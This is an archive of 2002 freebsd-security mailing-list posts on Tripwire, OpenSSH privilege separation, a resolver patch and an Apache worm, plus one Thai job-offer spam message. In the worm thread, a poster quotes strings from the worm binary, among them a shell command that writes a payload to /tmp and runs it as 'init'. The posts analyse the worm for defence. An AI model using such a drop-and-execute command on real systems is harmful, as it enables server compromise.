freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 4900F37B400 for ; Fri, 28 Jun 2002 09:38:27 -0700 (PDT) Received: from web10104.mail.yahoo.com (web10104.mail.yahoo.com [216.136.130.54]) by mx1.FreeBSD.org (Postfix) with SMTP id EEA7643E09 for ; Fri, 28 Jun 2002 09:38:26 -0700 (PDT) (envelope-from twigles@yahoo.com) Message-ID: <20020628163826.6245.qmail@web10104.mail.yahoo.com> Received: from [68.5.49.41] by web10104.mail.yahoo.com via HTTP; Fri, 28 Jun 2002 09:38:26 PDT Date: Fri, 28 Jun 2002 09:38:26 -0700 (PDT) From: twig les Subject: Re: Tripwire for Dummies To: Matt Snow , pgreen Cc: Jan Lentfer , FreeBSD Security Mailling List In-Reply-To: <20020628091612.H19665-100000@seven.slakin.net> MIME-Version: 1.0 Content-Type: text/plain; charset=us-ascii Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org This one looks good, although i haven't followed it. http://www.freeos.com/articles/3405/ --- Matt Snow wrote: > I think that -questions would have been a more > appropriete list to query, > but their is no need to be a such a schmuck. =P > > This Link is a bit outdated, but should still about > to 4.5 and 4.6. > > http://www.defcon1.org/~ghostrdr/FreeBSD-STABLE_and_IPFILTER.html > > * * * * * * * * > Matt Snow > (@) drama@slakin.net > (w) http://slakin.net. > > On Fri, 28 Jun 2002, pgreen wrote: > > > Stop being a self-efacer! > > > > On 28 Jun 2002, Jan Lentfer wrote: > > > > > Hi all, > > > > > > could someone be so kind and point my nose to a > configuration How-To of > > > Tripwire for a dummie like me? > > > > > > Thanks a lot in advance, > > > > > > Jan Lentfer > > > > > > > > > > > > > > > To Unsubscribe: send mail to majordomo@FreeBSD.org > > with "unsubscribe freebsd-security" in the body of > the message > > > > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-security" in the body of > the message ===== ----------------------------------------------------------- Only fools have all the answers. ----------------------------------------------------------- __________________________________________________ Do You Yahoo!? Yahoo! - Official partner of 2002 FIFA World Cup http://fifaworldcup.yahoo.com To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Jun 28 9:47:52 2002 Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 1A03E37B400 for ; Fri, 28 Jun 2002 09:47:49 -0700 (PDT) Received: from smtp.web.de (smtp01.web.de [194.45.170.210]) by mx1.FreeBSD.org (Postfix) with ESMTP id 92F8C43E06 for ; Fri, 28 Jun 2002 09:47:48 -0700 (PDT) (envelope-from Jan.Lentfer@web.de) Received: from [80.129.113.224] (helo=floundjan.homeip.net) by smtp.web.de with esmtp (WEB.DE(Exim) 4.70 #5) id 17NyuR-0007wo-00; Fri, 28 Jun 2002 18:47:47 +0200 Received: from localhost (localhost.lan [127.0.0.1]) by floundjan.homeip.net (Postfix on FreeBSD 4.5) with ESMTP id 5FE583D3; Fri, 28 Jun 2002 18:47:40 +0200 (CEST) Received: from jan-linux.lan (jan-linux.lan [192.168.0.20]) by floundjan.homeip.net (Postfix on FreeBSD 4.5) with ESMTP id B39C83D2; Fri, 28 Jun 2002 18:47:36 +0200 (CEST) Subject: Re: Tripwire for Dummies From: Jan Lentfer To: pgreen Cc: Jan Lentfer , FreeBSD Security Mailling List In-Reply-To: <20020628120524.I16249-100000@m-net.arbornet.org> References: <20020628120524.I16249-100000@m-net.arbornet.org> Content-Type: text/plain Content-Transfer-Encoding: 7bit X-Mailer: Ximian Evolution 1.0.7-1mdk Date: 28 Jun 2002 18:47:35 +0200 Message-Id: <1025282855.2820.35.camel@jan-linux.lan> Mime-Version: 1.0 X-Virus-Scanned: by AMaViS perl-10 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Am Fre, 2002-06-28 um 18.05 schrieb pgreen: > Stop being a self-efacer! Sorry, couldn't find that in my dictionary. Regards, Jan To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Jun 28 9:54:25 2002 Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 7CF9A37B401 for ; Fri, 28 Jun 2002 09:54:10 -0700 (PDT) Received: from smnolde.com (c-24-98-61-182.atl.client2.attbi.com [24.98.61.182]) by mx1.FreeBSD.org (Postfix) with ESMTP id 0CFDF43E09 for ; Fri, 28 Jun 2002 09:54:10 -0700 (PDT) (envelope-from scott@smnolde.com) Received: from [192.168.10.7] (helo=bsd.smnolde.com) by smnolde.com with esmtp (TLSv1:DES-CBC3-SHA:168) (Exim 3.36 #1) id 17Nz0c-000D83-00; Fri, 28 Jun 2002 12:54:10 -0400 Received: from scott by bsd.smnolde.com with local (Exim 3.33 #1) id 17Nz0b-0008yt-00; Fri, 28 Jun 2002 12:54:09 -0400 Date: Fri, 28 Jun 2002 12:54:09 -0400 From: "Scott M. Nolde" To: "Peter C. Lai" Cc: freebsd-security@freebsd.org Subject: Re: openssh and compression Message-ID: <20020628125409.D19461@smnolde.com> References: <20020628113815.I2363-100000@a2> <000601c21e36$897ad130$0300a8c0@anime.ca> <20020627212101.A17738@cowbert.2y.net> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline User-Agent: Mutt/1.2.5.1i In-Reply-To: <20020627212101.A17738@cowbert.2y.net>; from sirmoo@cowbert.2y.net on Thu, Jun 27, 2002 at 09:21:01PM -0400 X-GPG_Fingerprint: 0BD6 DDB4 2978 EB60 E0C8 33F2 BC34 9087 D869 AB48 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Oddly, I'm still having compression issues with sshd with the patch. 3.3p1 worked great for me, but now 3.4p1 is giving me all kinds of pain. - Scott Peter C. Lai(sirmoo@cowbert.2y.net)@2002.06.27 21:21:01 +0000: > Please read this: > http://docs.freebsd.org/cgi/getmsg.cgi?fetch=1244997+0+current/freebsd-security > > In short Koga Youichirou mentioned a syntax error in sys/mman.h > > this affects 3.4p1 > > > On Thu, Jun 27, 2002 at 07:58:29PM -0400, William Wong wrote: > > I had this happen too, but it was on a Redhat 6.2 system. I haven't figured > > out what's causing it though...Odd thing was that 3.3p1 didn't even run > > properly at least 3.4 does! > > > > - Will > > > > ----- Original Message ----- > > From: "Andrew McNaughton" > > To: > > Sent: Thursday, June 27, 2002 7:44 PM > > Subject: openssh and compression > > > > > > > > > > The other day I installed openssh-portable-3.3p1. It ran quite nicely, > > > apparently including privilege separation and compression. > > > > > > that is to say I could see that processes with reduced privileges were > > > being run, and connectionswith 'ssh -v' worked and reported that > > > compression was being used. > > > > > > Now I install openssh-portable-3.4p1 and when I start the daemon it tells > > > me: > > > > > > This platform does not support both privilege separation and compression > > > Compression disabled > > > > > > Is this simply a problem with the way the configuration works itself out, > > > or is there a real problem with supporting compression? > > > > > > Andrew McNaughton > > > > > > > > > To Unsubscribe: send mail to majordomo@FreeBSD.org > > > with "unsubscribe freebsd-security" in the body of the message > > > > > > > > > > > To Unsubscribe: send mail to majordomo@FreeBSD.org > > with "unsubscribe freebsd-security" in the body of the message > > -- > Peter C. Lai > University of Connecticut > Dept. of Molecular and Cell Biology | Undergraduate Research Assistant > http://cowbert.2y.net/ > > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-security" in the body of the message -- Scott Nolde GPG Key 0xD869AB48 To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Jun 28 10:14: 5 2002 Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id D538437B400 for ; Fri, 28 Jun 2002 10:13:59 -0700 (PDT) Received: from mile.nevermind.kiev.ua (office.netstyle.com.ua [213.186.199.26]) by mx1.FreeBSD.org (Postfix) with ESMTP id D4E2E43E0A for ; Fri, 28 Jun 2002 10:13:56 -0700 (PDT) (envelope-from never@mile.nevermind.kiev.ua) Received: from mile.nevermind.kiev.ua (never@localhost [127.0.0.1]) by mile.nevermind.kiev.ua (8.12.3/8.12.3) with ESMTP id g5SHDY25022930; Fri, 28 Jun 2002 20:13:49 +0300 (EEST) (envelope-from never@mile.nevermind.kiev.ua) Received: (from never@localhost) by mile.nevermind.kiev.ua (8.12.3/8.12.3/Submit) id g5SHDXNp022929; Fri, 28 Jun 2002 20:13:33 +0300 (EEST) Date: Fri, 28 Jun 2002 20:13:33 +0300 From: Alexandr Kovalenko To: Igor Roshchin Cc: security@FreeBSD.ORG Subject: Re: resolver patch for pre-4.5 OS. Message-ID: <20020628171333.GA3516@nevermind.kiev.ua> References: <200206272114.g5RLEiC86882@giganda.komkon.org> Mime-Version: 1.0 Content-Type: multipart/signed; micalg=pgp-sha1; protocol="application/pgp-signature"; boundary="tKW2IUtsqtDRztdT" Content-Disposition: inline In-Reply-To: <200206272114.g5RLEiC86882@giganda.komkon.org> User-Agent: Mutt/1.3.99i Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org --tKW2IUtsqtDRztdT Content-Type: text/plain; charset=koi8-r Content-Disposition: inline Content-Transfer-Encoding: quoted-printable Hello, Igor Roshchin! On Thu, Jun 27, 2002 at 05:14:44PM -0400, you wrote: > I wonder if anybody had any problem with the recommended patch for the > resolver problem in libc while using it with systems older then 4.5 ? RELENG_4_4 got this patch already. --=20 NEVE-RIPE Ukrainian FreeBSD User Group http://uafug.org.ua/ --tKW2IUtsqtDRztdT Content-Type: application/pgp-signature Content-Disposition: inline -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.0.7 (FreeBSD) iD8DBQE9HJk94jPu1egM76YRAheQAJsFtrChJVJ1HjIWtL3yYNBzK0IHFwCdExbz /sAgxXii3efrqBqabqtnfrM= =UOU+ -----END PGP SIGNATURE----- --tKW2IUtsqtDRztdT-- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Jun 28 10:30:35 2002 Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 022CB37B400 for ; Fri, 28 Jun 2002 10:30:32 -0700 (PDT) Received: from lariat.org (lariat.org [63.229.157.2]) by mx1.FreeBSD.org (Postfix) with ESMTP id F3F9E43E09 for ; Fri, 28 Jun 2002 10:30:30 -0700 (PDT) (envelope-from brett@lariat.org) Received: from mustang.lariat.org (IDENT:ppp1000.lariat.org@lariat.org [63.229.157.2]) by lariat.org (8.9.3/8.9.3) with ESMTP id LAA29637; Fri, 28 Jun 2002 11:29:59 -0600 (MDT) X-message-flag: Warning! Use of Microsoft Outlook is dangerous and makes your system susceptible to Internet worms. Message-Id: <4.3.2.7.2.20020628112127.024d9410@localhost> X-Sender: brett@localhost X-Mailer: QUALCOMM Windows Eudora Version 4.3.2 Date: Fri, 28 Jun 2002 11:27:13 -0600 To: flynn@energyhq.homeip.net, Domas Mituzas From: Brett Glass Subject: Re: Apache worm in the wild Cc: freebsd-security@FreeBSD.ORG, bugtraq@securityfocus.com, os_bsd@konferencijos.lt In-Reply-To: <20020628113834.GA10062@energyhq.homeip.net> References: <20020628125817.O68824-100000@axis.tdd.lt> <20020628125817.O68824-100000@axis.tdd.lt> Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org At 05:38 AM 6/28/2002, flynn@energyhq.homeip.net wrote: >I wonder how many variants of this kind of thing we'll see, but I assume most people >running Apache have upgraded already. Upgrading Apache may prevent your system from being taken over, but it doesn't necessarily prevent it from being DoSed. One of my Apache servers, which had been upgraded to 2.0.39, went berserk on June 25th, spawning the maximum number of child processes and then locking up. The server did not appear to have been infiltrated, but the logs were filled with megabytes of messages indicating that the child processes were repeatedly trying to free chunks of memory that were already free. Probably the result of an attempted exploit going awry. (It could have been aimed at Linux, or at a different version of Apache; can't tell. But clearly it got somewhere, though not all the way.) --Brett To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Jun 28 10:42: 7 2002 Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 0748437B400 for ; Fri, 28 Jun 2002 10:42:04 -0700 (PDT) Received: from smtp.web.de (smtp02.web.de [217.72.192.151]) by mx1.FreeBSD.org (Postfix) with ESMTP id 7C45043E09 for ; Fri, 28 Jun 2002 10:42:03 -0700 (PDT) (envelope-from Jan.Lentfer@web.de) Received: from [80.129.113.224] (helo=floundjan.homeip.net) by smtp.web.de with esmtp (WEB.DE(Exim) 4.70 #5) id 17Nzkw-0007iQ-00 for freebsd-security@FreeBSD.ORG; Fri, 28 Jun 2002 19:42:02 +0200 Received: from localhost (localhost.lan [127.0.0.1]) by floundjan.homeip.net (Postfix on FreeBSD 4.5) with ESMTP id 14D2A2A0 for ; Fri, 28 Jun 2002 19:42:01 +0200 (CEST) Received: from jan-linux.lan (jan-linux.lan [192.168.0.20]) by floundjan.homeip.net (Postfix on FreeBSD 4.5) with ESMTP id 3E4926E for ; Fri, 28 Jun 2002 19:41:57 +0200 (CEST) Subject: Re: Tripwire for Dummies From: Jan Lentfer Cc: FreeBSD Security Mailling List In-Reply-To: <1025280108.2819.27.camel@jan-linux.lan> References: <1025280108.2819.27.camel@jan-linux.lan> Content-Type: text/plain Content-Transfer-Encoding: 7bit X-Mailer: Ximian Evolution 1.0.7-1mdk Date: 28 Jun 2002 19:41:55 +0200 Message-Id: <1025286115.2819.46.camel@jan-linux.lan> Mime-Version: 1.0 X-Virus-Scanned: by AMaViS perl-10 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Am Fre, 2002-06-28 um 18.01 schrieb Jan Lentfer: > Hi all, > > could someone be so kind and point my nose to a configuration How-To of > Tripwire for a dummie like me? Thanks for all your replies, they have been all very helpfull. I just have one, maybe two questions left: I read that it was best to move the tripwire database to a read-only medium (floppy or cdrom). I used the defaults of the tripwire-2.3 ports and ended up with 3MB database. How did you guys configure your tripwire? Is it better to clean up the configuration and by that shrink the database to fit on a floppy? If so, what HAS TO stay, what can be removed? Or is it better to stuff the database on a CD-RW and burn a new one everytime you change stuff? Thanks a lot in advance, Jan PS: If this does not belong here, please tell me. I think it is somewhat security related, but maybe it would fit in newbie,too ;) To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Jun 28 10:46: 6 2002 Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 2C6F337B405 for ; Fri, 28 Jun 2002 10:46:01 -0700 (PDT) Received: from khavrinen.lcs.mit.edu (khavrinen.lcs.mit.edu [18.24.4.193]) by mx1.FreeBSD.org (Postfix) with ESMTP id 19ED043E1F for ; Fri, 28 Jun 2002 10:45:39 -0700 (PDT) (envelope-from wollman@khavrinen.lcs.mit.edu) Received: from khavrinen.lcs.mit.edu (localhost [IPv6:::1]) by khavrinen.lcs.mit.edu (8.12.3/8.12.3) with ESMTP id g5SHjZDK046372; Fri, 28 Jun 2002 13:45:35 -0400 (EDT) (envelope-from wollman@khavrinen.lcs.mit.edu) Received: (from wollman@localhost) by khavrinen.lcs.mit.edu (8.12.3/8.12.3/Submit) id g5SHjZbc046369; Fri, 28 Jun 2002 13:45:35 -0400 (EDT) (envelope-from wollman) Date: Fri, 28 Jun 2002 13:45:35 -0400 (EDT) From: Garrett Wollman Message-Id: <200206281745.g5SHjZbc046369@khavrinen.lcs.mit.edu> To: Alexandr Kovalenko Cc: security@FreeBSD.ORG Subject: Re: resolver patch for pre-4.5 OS. In-Reply-To: <20020628171333.GA3516@nevermind.kiev.ua> References: <200206272114.g5RLEiC86882@giganda.komkon.org> <20020628171333.GA3516@nevermind.kiev.ua> Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org < said: > RELENG_4_4 got this patch already. We were able to simply put a 4-stable libc.so onto our one remaining 4.4 machine, and have observed no adverse effects. We're about to do the same with our 4.5 machines, which looks like it will keep us going until we have some time to deal with the (principally sendmail-related) issues that have kept us from upgrading. -GAWollman To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Jun 28 10:50:39 2002 Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 6CBFB37B400 for ; Fri, 28 Jun 2002 10:50:35 -0700 (PDT) Received: from nexusxi.com (balistraria.nexusxi.com [216.123.202.196]) by mx1.FreeBSD.org (Postfix) with SMTP id AEDF043E09 for ; Fri, 28 Jun 2002 10:50:34 -0700 (PDT) (envelope-from dowen@nexusxi.com) Received: (qmail 92595 invoked by uid 1000); 28 Jun 2002 17:50:27 -0000 Date: Fri, 28 Jun 2002 11:50:27 -0600 From: "Dalin S. Owen" To: freebsd-security@freebsd.org Subject: SSH Patches Message-ID: <20020628115027.A92508@nexusxi.com> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline User-Agent: Mutt/1.2.5.1i Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Are there going to be patches for the bundled FreeBSD OpenSSH anytime soon, so I can patch my 4.6-RELEASE system? :) Also, when is the apache13-ssl port going to be un-banned and updated? Thanks. -- Regards, Dalin S. Owen To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Jun 28 10:55: 8 2002 Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 0A52937B401 for ; Fri, 28 Jun 2002 10:55:01 -0700 (PDT) Received: from hokkshideh2.jetcafe.org (hokkshideh2.jetcafe.org [205.147.43.8]) by mx1.FreeBSD.org (Postfix) with ESMTP id 9480443E0F for ; Fri, 28 Jun 2002 10:55:00 -0700 (PDT) (envelope-from dave@jetcafe.org) Received: from hokkshideh2.jetcafe.org (localhost [127.0.0.1]) by hokkshideh2.jetcafe.org (8.11.6/8.11.6) with ESMTP id g5SHt0029997 for ; Fri, 28 Jun 2002 10:55:00 -0700 (PDT) (envelope-from dave@hokkshideh2.jetcafe.org) Message-Id: <200206281755.g5SHt0029997@hokkshideh2.jetcafe.org> X-Mailer: exmh version 2.5 07/13/2001 with nmh-1.0.4 To: freebsd-security@freebsd.org Subject: Possible caveat to UsePrivSep on openssh port Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Date: Fri, 28 Jun 2002 10:54:55 -0700 From: Dave Hayes Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org This message only applies to people installing openssh using the /usr/ports/security/openssh port. One thing I've noticed is that a couple random machines needed to have host.conf and resolv.conf installed into ${EMPTYDIR}/etc, otherwise they would hang attempting to do a reverse lookup. You might check this if your ssh is extremely slow to connect. ------ Dave Hayes - Consultant - Altadena CA, USA - dave@jetcafe.org >>> The opinions expressed above are entirely my own <<< "There is someone willing to argue about any point." --I don't know, but I'll argue any attribution To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Jun 28 11:10:41 2002 Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 270C337B400 for ; Fri, 28 Jun 2002 11:10:33 -0700 (PDT) Received: from deceit.org (pcp01535709pcs.huntsv01.al.comcast.net [68.62.184.61]) by mx1.FreeBSD.org (Postfix) with ESMTP id 2007D43E06 for ; Fri, 28 Jun 2002 11:10:32 -0700 (PDT) (envelope-from wink@deceit.org) Received: from Lust ([12.13.161.84]) by deceit.org (8.9.3/8.9.3) with SMTP id LAA16252; Fri, 28 Jun 2002 11:31:36 -0500 (CDT) (envelope-from wink@deceit.org) Message-ID: <016901c21ecf$0e506ad0$a101000a@Lust> From: "wink" To: "Domas Mituzas" , Cc: , References: <20020628125817.O68824-100000@axis.tdd.lt> Subject: Re: Apache worm in the wild Date: Fri, 28 Jun 2002 13:10:05 -0500 MIME-Version: 1.0 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: 7bit X-Priority: 3 X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook Express 6.00.2600.0000 X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2600.0000 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Running strings on the binary amongst other things produces an ip address (12.127.17.71) that resolves to dns-rs1.bgtmo.ip.att.net, and also: FreeBSD 4.5 x86 / Apache/1.3.22-24 (Unix) FreeBSD 4.5 x86 / Apache/1.3.20 (Unix) I went ahead and touch'ed .a, .uua, and .log in /tmp and chflags to set them immutable as I didn't see any real error handling on failed i/o operations. Some other strings not mentioned yet are: rm -rf /tmp/.a;cat > /tmp/.uua << __eof__; mv /tmp/tmp /tmp/init;export PATH="/tmp";init %s that's all i have time for at the moment. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Jun 28 11:31: 8 2002 Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 7E88437B400 for ; Fri, 28 Jun 2002 11:31:00 -0700 (PDT) Received: from seven.slakin.net (adsl-67-112-126-134.dsl.pltn13.pacbell.net [67.112.126.134]) by mx1.FreeBSD.org (Postfix) with ESMTP id 1D62A43E06 for ; Fri, 28 Jun 2002 11:31:00 -0700 (PDT) (envelope-from drama@slakin.net) Received: from localhost (localhost.slakin.net [127.0.0.1]) by seven.slakin.net (Postfix) with ESMTP id DD036800; Fri, 28 Jun 2002 11:31:02 -0700 (PDT) Date: Fri, 28 Jun 2002 11:31:02 -0700 (PDT) From: Matt Snow To: Jan Lentfer Cc: FreeBSD Security Mailling List Subject: Re: Tripwire for Dummies In-Reply-To: <1025286115.2819.46.camel@jan-linux.lan> Message-ID: <20020628112448.P21599-100000@seven.slakin.net> MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org I only suggested to send to -questions because I see plenty of newbie-security related questions on that list. I would say send to both security and questions but I have seen much objection to cross postings. ;) * * * * * * * * Matt Snow (@) drama@slakin.net (w) http://slakin.net. On 28 Jun 2002, Jan Lentfer wrote: > Am Fre, 2002-06-28 um 18.01 schrieb Jan Lentfer: > > Hi all, > > > > could someone be so kind and point my nose to a configuration How-To of > > Tripwire for a dummie like me? > > > Thanks for all your replies, they have been all very helpfull. I just > have one, maybe two questions left: > I read that it was best to move the tripwire database to a read-only > medium (floppy or cdrom). I used the defaults of the tripwire-2.3 ports > and ended up with 3MB database. How did you guys configure your > tripwire? Is it better to clean up the configuration and by that shrink > the database to fit on a floppy? If so, what HAS TO stay, what can be > removed? Or is it better to stuff the database on a CD-RW and burn a new > one everytime you change stuff? > > Thanks a lot in advance, > > Jan > > PS: If this does not belong here, please tell me. I think it is somewhat > security related, but maybe it would fit in newbie,too ;) > > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-security" in the body of the message > To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Jun 28 11:39:42 2002 Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 5D78837B40D for ; Fri, 28 Jun 2002 11:39:20 -0700 (PDT) Received: from mail3.ksc.th.com (mail3.ksc.th.com [203.155.0.234]) by mx1.FreeBSD.org (Postfix) with ESMTP id 0F93D43E0F for ; Fri, 28 Jun 2002 11:39:12 -0700 (PDT) (envelope-from easytoberich01@yahoo.com) Received: from ksc.th.com ([203.107.246.47]) by mail3.ksc.th.com (8.12.1/8.12.0) with SMTP id g5SIYReu007846 for ; Sat, 29 Jun 2002 01:39:09 +0700 Message-Id: <200206281839.g5SIYReu007846@mail3.ksc.th.com> Date: Sat, 29 Jun 2002 01:41:13 To: FreeBSD-security@FreeBSD.org From: easytoberich01@yahoo.com (international e-business) Subject: ÊÓËÃѺ¼Ùé·Õèµéͧ¡ÒÃâÍ¡ÒÊ㹡ÒÃà»ÅÕè¹á»Å§ªÕÇÔµ Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org !!!!! Part-Time Job!! ÊÓËÃѺ¹Ñ¡àÃÕ¹ ¹Ñ¡ÈÖ¡ÉÒ áÅмÙé·Ó§Ò¹»ÃÐ¨Ó ¤Ø³µéͧ¡ÒçҹẺ¹ÕéºéÒ§äËÁ…?? -§Ò¹ parttime ·Ó§Ò¹·ÕèºéÒ¹ä´é ¶éҤسãªé Internet à»ç¹ -·Ó§Ò¹à¾Õ§ÇѹÅÐ 2-3 ªÁ. -ÃÒÂä´é 5,000 – 15,000 ºÒ· ¶éҤسà»ç¹¤¹Ë¹Ö觷Õè·Ó§Ò¹»ÃШÓËÃ×ÍÂѧäÁèÁÕ§Ò¹·Ó ¹Ñ¡ÈÖ¡ÉÒ·Õè¡ÓÅѧÈÖ¡ÉÒÍÂÙè ¼ÙéÇèÒ§§Ò¹ ËÃ×ͼÙé·ÕèÂѧ¾ÍÁÕàÇÅÒÇèÒ§¨Ò¡§Ò¹»ÃÐ¨Ó ÁդسÊÁºÑµÔàº×éͧµé¹´Ñ§¹Õé 1. ÁÕ·Ñȹ¤µÔ·Õè´Õ 2. ¾ÃéÍÁ·Õè¨ÐàÃÕ¹ÃÙé à¹×èͧ¨Ò¡à»ç¹ÃкºãËÁè¨Ö§µéͧãËéÁÕ¡ÒÃͺÃÁãËéµÒÁ¤ÇÒÁàËÁÒÐÊÁ 3. µéͧ¡Ò÷Õè¨Ð·Ó§Ò¹ÍÂèÒ§¨ÃÔ§¨Ñ§ ÍÂÒ¡·Õè¨Ðà»ÅÕ蹰ҹзҧ¡ÒÃà§Ô¹¢Í§µ¹àͧ áÅÐÍÂÒ¡ÁÕÃÒÂä´é¨Ò¡¡Ò÷ӧҹµÃ§¹Õé¨ÃÔ§æ ·Ø¡ÍÂèÒ§à»ç¹ä»ä´é ã¹ http://www.geocities.com/getchances2000/ ÍÂèÒ !…………….. à»ç¹á¤èà¾Õ§¤¹·Õè¹Ñè§ÃÍâÍ¡ÒÊ To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Jun 28 11:42:32 2002 Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 7EF8737B400 for ; Fri, 28 Jun 2002 11:41:51 -0700 (PDT) Received: from munkboxen.mine.nu (213-152-51-194.dsl.eclipse.net.uk [213.152.51.194]) by mx1.FreeBSD.org (Postfix) with ESMTP id C128143E35 for ; Fri, 28 Jun 2002 11:40:54 -0700 (PDT) (envelope-from munk@munkboxen.mine.nu) Received: (from munk@localhost) by munkboxen.mine.nu (8.11.6/8.11.6) id g5SIe1712609 for freebsd-security@FreeBSD.ORG; Fri, 28 Jun 2002 19:40:01 +0100 (BST) (envelope-from munk) Date: Fri, 28 Jun 2002 19:40:00 +0100 From: Jez Hancock To: FreeBSD Security Mailling List Subject: Re: Tripwire for Dummies Message-ID: <20020628194000.A12567@munkboxen.mine.nu> Mail-Followup-To: FreeBSD Security Mailling List References: <1025280108.2819.27.camel@jan-linux.lan> <1025286115.2819.46.camel@jan-linux.lan> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline User-Agent: Mutt/1.2.5.1i In-Reply-To: 